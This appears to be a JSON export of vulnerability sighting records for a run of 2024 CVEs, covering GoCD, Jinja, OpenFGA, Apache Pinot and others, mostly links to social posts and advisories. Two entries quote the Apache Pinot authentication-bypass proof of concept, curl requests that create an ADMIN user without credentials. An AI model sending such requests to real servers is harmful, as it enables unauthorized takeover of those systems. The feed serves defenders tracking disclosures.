{"vulnerability": "cve-2024-5632", "sightings": [{"uuid": "d28968b8-46e4-4563-bf4e-800e23c0a9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702928777162458", "content": "", "creation_timestamp": "2024-12-23T15:50:06.704230Z"}, {"uuid": "af9daae1-5786-4de8-a3ce-301ff03dcf80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://bsky.app/profile/gothburz.bsky.social/post/3lfpjgt3ndz2z", "content": "", "creation_timestamp": "2025-01-14T15:02:30.715640Z"}, {"uuid": "c66074a1-ba5e-4b5b-ad24-58b5d64250ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56320", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765180178483233", "content": "", "creation_timestamp": "2025-01-03T15:41:27.472566Z"}, {"uuid": "5e5cd1a7-4f45-4b91-acae-20a9cfd7f860", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56321", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765203311496444", "content": "", "creation_timestamp": "2025-01-03T15:47:20.573030Z"}, {"uuid": "cc2828a1-9944-4b3e-bc69-c40d701cae49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56322", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765226599280497", "content": "", "creation_timestamp": "2025-01-03T15:53:18.294117Z"}, {"uuid": "2e1c3970-4106-4bfa-9c9b-4334a9864e67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56324", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765249621753886", "content": "", "creation_timestamp": "2025-01-03T15:59:07.149063Z"}, {"uuid": "c5538a4e-55f6-4d58-9714-3a7655dca818", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947614956436564", "content": "", "creation_timestamp": "2025-02-04T20:57:01.326323Z"}, {"uuid": "5960382b-7195-4d20-8c08-94454ce7e6e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "http://www.zerodayinitiative.com/advisories/ZDI-25-109/", "content": "", "creation_timestamp": "2025-03-03T05:00:00.000000Z"}, {"uuid": "8600f9a0-5348-4dc9-9e62-799120b397db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.096768Z"}, {"uuid": "b2e2ba76-6802-4a18-a413-6faa89877407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.093633Z"}, {"uuid": "29ac1eb7-2b88-41a1-8efc-f015a6aa32e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llzctfed6c2p", "content": "", "creation_timestamp": "2025-04-04T21:02:08.920503Z"}, {"uuid": "a3537656-601a-4f5b-af48-b26dd41d6919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmlupxwjxk24", "content": "", "creation_timestamp": "2025-04-12T06:10:15.134152Z"}, {"uuid": "9ae58492-33e4-4735-8221-272e0eb51f81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-15T13:28:31.000000Z"}, {"uuid": "71516f29-ed4a-42a3-beac-d82e36da6fce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-16T03:45:00.000000Z"}, {"uuid": "e11788f7-7e40-491f-92e6-c9e89baf2fe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "MISP/9ca82492-7deb-4197-a6f1-191e121eef96", "content": "", "creation_timestamp": "2025-08-25T13:32:04.000000Z"}, {"uuid": "b642f794-db2c-4da8-98c5-cdd30ec0c7f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3m6mmbvm3sc2c", "content": "", "creation_timestamp": "2025-11-27T14:45:18.433016Z"}, {"uuid": "32019c12-89b3-414a-bc15-c85496230203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "e7133788-70f2-4375-adc1-3e08065635d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56329", "type": "seen", "source": "https://t.me/cvedetector/13458", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56329 - Socialstream Authentication Linking Confirmation Bypass\", \n  \"Content\": \"CVE ID : CVE-2024-56329 \nPublished : Dec. 20, 2024, 8:15 p.m. | 24\u00a0minutes ago \nDescription : Socialstream is a third-party package for Laravel Jetstream. It replaces the published authentication and profile scaffolding provided by Laravel Jetstream, with scaffolding that has support for Laravel Socialite. When linking a social account to an already authenticated user, the lack of a confirmation step introduces a security risk. This is exacerbated if ->stateless() is used in the Socialite configuration, bypassing state verification and making the exploit easier. Developers should ensure that users explicitly confirm account linking and avoid configurations that skip critical security checks. Socialstream v6.2 introduces a new custom route that requires a user to \"Confirm\" or \"Deny\" a request to link a social account. Users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-20T21:46:09.000000Z"}, {"uuid": "bd1ac978-e477-4b4c-a467-c11ce908f678", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://t.me/cvedetector/13538", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56326 - \"Jinja Untrusted Template Code Execution Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-56326 \nPublished : Dec. 23, 2024, 4:15 p.m. | 43\u00a0minutes ago \nDescription : Jinja is an extensible templating engine. Prior to 3.1.5, An oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to store a reference to a malicious string's format method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox. This vulnerability is fixed in 3.1.5. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"23 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-23T18:20:01.000000Z"}, {"uuid": "b75f4fe1-e959-4df2-846a-ac1a7f1ad5ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56324", "type": "seen", "source": "https://t.me/cvedetector/14226", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56324 - GoCD XXE Injection\", \n  \"Content\": \"CVE ID : CVE-2024-56324 \nPublished : Jan. 3, 2025, 4:15 p.m. | 35\u00a0minutes ago \nDescription : GoCD is a continuous deliver server. GoCD versions prior to 24.4.0 can allow GoCD \"group admins\" to abuse ability to edit the raw XML configuration for groups they administer to trigger XML External Entity (XXE) injection on the GoCD server. Theoretically, the XXE vulnerability can result in additional attacks such as SSRF, information disclosure from the GoCD server, and directory traversal, although these additional attacks have not been explicitly demonstrated as exploitable. This issue is fixed in GoCD 24.5.0. Some workarounds are available. One may temporarily block access to  `/go/*/pipelines/snippet` routes from an external reverse proxy or WAF if one's \"group admin\" users do not need the functionality to edit the XML of pipelines directly (rather than using the UI, or using a configuration repository). One may also prevent external access from one's GoCD server to arbitrary locations using some kind of environment egress control. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-03T17:51:31.000000Z"}, {"uuid": "dd539675-9b78-4169-9ca8-781a0ca8b05c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56322", "type": "seen", "source": "https://t.me/cvedetector/14225", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56322 - GoCD XXE Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-56322 \nPublished : Jan. 3, 2025, 4:15 p.m. | 35\u00a0minutes ago \nDescription : GoCD is a continuous deliver server. GoCD versions 16.7.0 through 24.4.0 (inclusive) can allow GoCD admins to abuse a hidden/unused configuration repository (pipelines as code) feature to allow XML External Entity (XXE) injection on the GoCD Server which will be executed when GoCD periodically scans configuration repositories for pipeline updates, or is triggered by an administrator or config repo admin. In practice the impact of this vulnerability is limited, in most cases without combining with another vulnerability, as only GoCD (super) admins have the ability to abuse this vulnerability. Typically a malicious GoCD admin can cause much larger damage than that they can do with XXE injection. The issue is fixed in GoCD 24.5.0. As a workaround, prevent external access from the GoCD server to arbitrary locations using some kind of environment egress control. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-03T17:51:31.000000Z"}, {"uuid": "cea2c5ff-d72a-4480-9393-2de61e8b0bbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56321", "type": "seen", "source": "https://t.me/cvedetector/14224", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56321 - GoCD Remote Command Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-56321 \nPublished : Jan. 3, 2025, 4:15 p.m. | 35\u00a0minutes ago \nDescription : GoCD is a continuous deliver server. GoCD versions 18.9.0 through 24.4.0 (inclusive) can allow GoCD admins to abuse the backup configuration \"post-backup script\" feature to potentially execute arbitrary scripts on the hosting server or container as GoCD's user, rather than pre-configured scripts. In practice the impact of this vulnerability is limited, as in most configurations a user who can log into the GoCD UI as an admin also has host administration permissions for the host/container that GoCD runs on, in order to manage artifact storage and other service-level configuration options. Additionally, since a GoCD admin has ability to configure and schedule pipelines tasks on all GoCD agents available to the server, the fundamental functionality of GoCD allows co-ordinated task execution similar to that of post-backup-scripts. However in restricted environments where the host administration is separated from the role of a GoCD admin, this may be unexpected. The issue is fixed in GoCD 24.5.0. Post-backup scripts can no longer be executed from within certain sensitive locations on the GoCD server. No known workarounds are available. \nSeverity: 3.8 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-03T17:51:30.000000Z"}, {"uuid": "12ccc425-61cc-4746-adb7-cb5b4e492c39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56320", "type": "seen", "source": "https://t.me/cvedetector/14223", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56320 - GoCD Unauthorized Admin Access Privilege Escalation\", \n  \"Content\": \"CVE ID : CVE-2024-56320 \nPublished : Jan. 3, 2025, 4:15 p.m. | 35\u00a0minutes ago \nDescription : GoCD is a continuous deliver server. GoCD versions prior to 24.5.0 are vulnerable to admin privilege escalation due to improper authorization of access to the admin \"Configuration XML\" UI feature, and its associated API. A malicious insider/existing authenticated GoCD user with an existing GoCD user account could abuse this vulnerability to access information intended only for GoCD admins, or to escalate their privileges to that of a GoCD admin in a persistent manner. it is not possible for this vulnerability to be abused prior to authentication/login. The issue is fixed in GoCD 24.5.0. GoCD users who are not able to immediate upgrade can mitigate this issue by using a reverse proxy, WAF or similar to externally block access paths with a `/go/rails/` prefix. Blocking this route causes no loss of functionality. If it is not possible to upgrade or block the above route, consider reducing the GoCD user base to more trusted set of users, including temporarily disabling use of plugins such as the guest-login-plugin, which allow limited anonymous access as a regular user account. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-03T17:51:29.000000Z"}, {"uuid": "acdc0eaf-d677-4140-8286-05e5891daba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823205947381993", "content": "", "creation_timestamp": "2025-01-13T21:38:13.192199Z"}, {"uuid": "81d70a7f-b9c5-4a3e-949f-7c097fa24a73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfnrbfzgav2h", "content": "", "creation_timestamp": "2025-01-13T22:17:19.454077Z"}, {"uuid": "007c203c-ffc3-452d-b5aa-74188de160d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lfnsgra5ei2y", "content": "", "creation_timestamp": "2025-01-13T22:38:13.792215Z"}, {"uuid": "13507af6-3b2e-49a3-b065-963d6459f3a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhey4btmih2n", "content": "", "creation_timestamp": "2025-02-04T21:16:09.093865Z"}, {"uuid": "66cd981d-d331-41d5-ab74-f5ba764ef2ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhf3uwnz362r", "content": "", "creation_timestamp": "2025-02-04T22:23:43.865370Z"}, {"uuid": "0d84828d-a8fd-4e58-9672-90dc7fded24c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lk34egd5mc2w", "content": "", "creation_timestamp": "2025-03-11T03:21:18.175758Z"}, {"uuid": "000e5b73-4d87-49e9-ae82-2f4dc7ef1bac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/114103812642418026", "content": "", "creation_timestamp": "2025-03-04T11:00:09.277985Z"}, {"uuid": "0cb2dc2b-af99-48a1-944d-35c401d5c014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2024-56325", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk3kczpmgc27", "content": "", "creation_timestamp": "2025-03-11T07:31:00.897315Z"}, {"uuid": "275142f2-e952-4d74-b6f8-e654b030b37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-56325.yaml", "content": "", "creation_timestamp": "2025-04-03T13:16:13.000000Z"}, {"uuid": "42cbeb12-b2ef-47de-ab3d-8b8fb1197ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://vulnerability.circl.lu/comment/a9f2cad3-dbfc-4703-9c5f-9af054301f88", "content": "", "creation_timestamp": "2025-03-11T05:25:53.938762Z"}, {"uuid": "ce55d6e4-2ade-4872-9018-34ac4e93f742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56323", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1424", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56323\n\ud83d\udd39 Description: OpenFGA is an authorization/permission engine. IN OpenFGA v1.3.8 to v1.8.2 (Helm chart openfga-0.1.38 to openfga-0.2.19, docker v1.3.8 to v.1.8.2)  are vulnerable to authorization bypass under the following conditions: 1. calling Check API or ListObjects with a model that uses [conditions](https://openfga.dev/docs/modeling/conditions), and 2. calling Check API or ListObjects API with [contextual tuples](https://openfga.dev/docs/concepts#what-are-contextual-tuples) that include conditions and 3. OpenFGA is configured with caching enabled (`OPENFGA_CHECK_QUERY_CACHE_ENABLED`). Users are advised to upgrade to v1.8.3. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T21:33:30.556Z\n\ud83d\udccf Modified: 2025-01-14T00:29:58.019Z\n\ud83d\udd17 References:\n1. https://github.com/openfga/openfga/security/advisories/GHSA-32q6-rr98-cjqv", "creation_timestamp": "2025-01-14T01:07:30.000000Z"}, {"uuid": "a92eca59-6eb9-41cf-b2fa-a9d543047228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9868", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56325\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}  http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.\n\ud83d\udccf Published: 2025-04-01T09:07:14.185Z\n\ud83d\udccf Modified: 2025-04-01T09:07:14.185Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v", "creation_timestamp": "2025-04-01T09:32:42.000000Z"}, {"uuid": "81c2a461-a786-4c8a-b3ff-76797cc36071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/cvedetector/21746", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56325 - Apache Pinot Authentication Bypass\", \n  \"Content\": \"CVE ID : CVE-2024-56325 \nPublished : April 1, 2025, 9:15 a.m. | 2\u00a0hours, 12\u00a0minutes ago \nDescription : Authentication Bypass Issue  \n  \nIf the path does not contain / and contain., authentication is not required.  \n  \nExpected Normal Request and Response Example  \n  \ncurl -X POST -H \"Content-Type: application/json\" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}  http://{server_ip}:9000/users   \n  \n  \nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}  \n  \n  \nMalicious Request and Response Example   \n  \ncurl -X POST -H \"Content-Type: application/json\" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .  \n  \n  \nReturn: {\"users\":{}}  \n  \n  \n  \n   \n  \nA new user gets added bypassing authentication, enabling the user to control Pinot. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"01 Apr 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-04-01T13:37:52.000000Z"}, {"uuid": "cfae3714-1ac7-4f62-9025-0cfc9b64ee91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://t.me/cvedetector/15188", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56323 - OpenFGA Authorization Bypass Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-56323 \nPublished : Jan. 13, 2025, 10:15 p.m. | 25\u00a0minutes ago \nDescription : OpenFGA is an authorization/permission engine. IN OpenFGA v1.3.8 to v1.8.2 (Helm chart openfga-0.1.38 to openfga-0.2.19, docker v1.3.8 to v.1.8.2)  are vulnerable to authorization bypass under the following conditions: 1. calling Check API or ListObjects with a model that uses [conditions](), and 2. calling Check API or ListObjects API with [contextual tuples]() that include conditions and 3. OpenFGA is configured with caching enabled (`OPENFGA_CHECK_QUERY_CACHE_ENABLED`). Users are advised to upgrade to v1.8.3. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"13 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-13T23:46:21.000000Z"}, {"uuid": "33d98895-a324-4a83-8600-de192aa93503", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-5632", "type": "seen", "source": "https://t.me/cvedetector/307", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-5632 - Longse NVR (Network Video Recorder) model\u00a0NVR3608P\", \n  \"Content\": \"CVE ID : CVE-2024-5632 \nPublished : July 9, 2024, 11:15 a.m. | 35\u00a0minutes ago \nDescription : Longse NVR (Network Video Recorder) model\u00a0NVR3608PGE2W, as well as products based on this device, create a WiFi network with a default password.  \nA user is neither advised to change it during the installation process, nor such a need is described in the manual. As the cameras from the same kit connect automatically, it is very probable for the default password to be left unchanged. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-09T13:55:46.000000Z"}, {"uuid": "db23f6f3-5ff7-4e89-b659-df9ef6b46d18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681851388329044", "content": "", "creation_timestamp": "2024-12-19T22:29:51.145153Z"}, {"uuid": "5e059928-3141-4dcf-80d7-c47ebb56fa56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3ldoyum6vh72m", "content": "", "creation_timestamp": "2024-12-19T23:15:37.117919Z"}, {"uuid": "0aef700b-b125-4d65-a71b-6de73cf6017a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56329", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113686930684976106", "content": "", "creation_timestamp": "2024-12-20T20:01:34.934200Z"}, {"uuid": "8f2fccff-afb1-4c4f-8634-b4552fd5c1e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56329", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3ldr7cgknk72a", "content": "", "creation_timestamp": "2024-12-20T20:16:05.426025Z"}, {"uuid": "f9e6cb66-24f4-475b-aeae-2229fc41406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3llnjekyxh226", "content": "", "creation_timestamp": "2025-03-31T04:27:09.066261Z"}, {"uuid": "0af93022-602d-4194-baa4-fcf4f815f964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": 